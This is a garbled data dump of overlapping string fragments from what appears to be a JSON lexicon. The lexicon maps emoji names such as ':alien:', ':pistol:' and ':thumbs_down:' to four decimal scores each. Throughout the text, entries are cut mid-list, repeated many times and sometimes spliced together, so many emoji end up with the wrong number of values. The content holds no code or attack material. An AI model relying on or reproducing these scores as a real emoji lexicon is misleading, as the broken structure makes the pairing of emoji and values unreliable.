\":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294,", "0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17,", "0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996,", "\":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003,", "0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272],", "[0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081,", "0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239],", "[0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], 
\":speak-no-evil_monkey:\": [0.214, 0.2, 0.081,", "0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\":", "0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002,", "0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278,", "0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\":", "0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344],", "0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132],", "0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289],", "0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23],", "0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046,", "0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27],", "0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\":", "\":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244,", "0.27899999999999997, 0.345, 0.252], 
\":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215],", "0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002,", "\":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191,", "0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191,", "0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22,", "0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\":", "\":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247,", "0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\":", "0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\":", "\":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155,", "0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\":", "\":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35,", "0.026000000000000002, 0.09300000000000001], \":white_small_square:\": 
[0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\":", "0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079],", "0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12,", "0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235],", "0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\":", "[0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995,", "0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063],", "\":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998,", "\":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997,", "\":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304,", "0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996,", "0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": 
[0.258,", "\":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002,", "0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\":", "\":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997,", "\":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002,", "0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002,", "0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998,", "0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\":", "0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34,", "[0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139,", "0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154],", "0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002,", 
"\":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332,", "0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\":", "0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175],", "0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994,", "\":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262,", "0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001,", "[0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21,", "[0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168,", "0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\":", "0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998,", "\":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215,", "\":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 
0.221,", "\":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231,", "[0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373,", "[0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191,", "0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\":", "0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\":", "0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\":", "0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\":", "0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003],", "0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205],", "0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213,", "\":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], 
\":white_medium_star:\": [0.237, 0.175,", "\":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244,", "0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134,", "0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152,", "[0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21,", "0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002,", "\":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331,", "0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997,", "0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23],", "[0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002,", "0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157,", "0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253],", "[0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146,", "0.155, 0.179, 0.17600000000000002], 
\":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231],", "0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\":", "0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\":", "0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292],", "0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159],", "[0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205,", "[0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999,", "0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\":", "0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\":", "[0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002,", "[0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002,", "[0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131,", "[0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 
0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996,", "0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24],", "\":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235,", "0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23,", "\":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242,", "[0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281,", "0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\":", "0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\":", "0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\":", "[0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226,", "0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099,", "\":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17,", "0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 
0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\":", "[0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128,", "\":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001,", "0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002],", "[0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314,", "0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265],", "0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001],", "\":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262,", "0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115,", "\":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999,", "\":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998,", "0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\":", "[0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 
0.16899999999999998,", "[0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002,", "[0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24,", "\":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997,", "[0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172,", "0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094],", "0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23],", "0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106,", "0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002],", "\":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261,", "\":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11,", "0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086],", "[0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001,", "0.151], 
\":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107,", "0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284],", "\":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268,", "0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\":", "0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327,", "0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222,", "\":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221,", "0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\":", "\":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276,", "0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31],", "0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998,", "[0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226,", "0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 
0.136, 0.133], \":videocassette:\": [0.213,", "[0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284,", "\":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17,", "0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259],", "0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162,", "\":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258,", "[0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305,", "[0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049,", "\":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073,", "0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142,", "[0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998,", "0.196, 0.111], \":face_with_steam_from_nose:\": 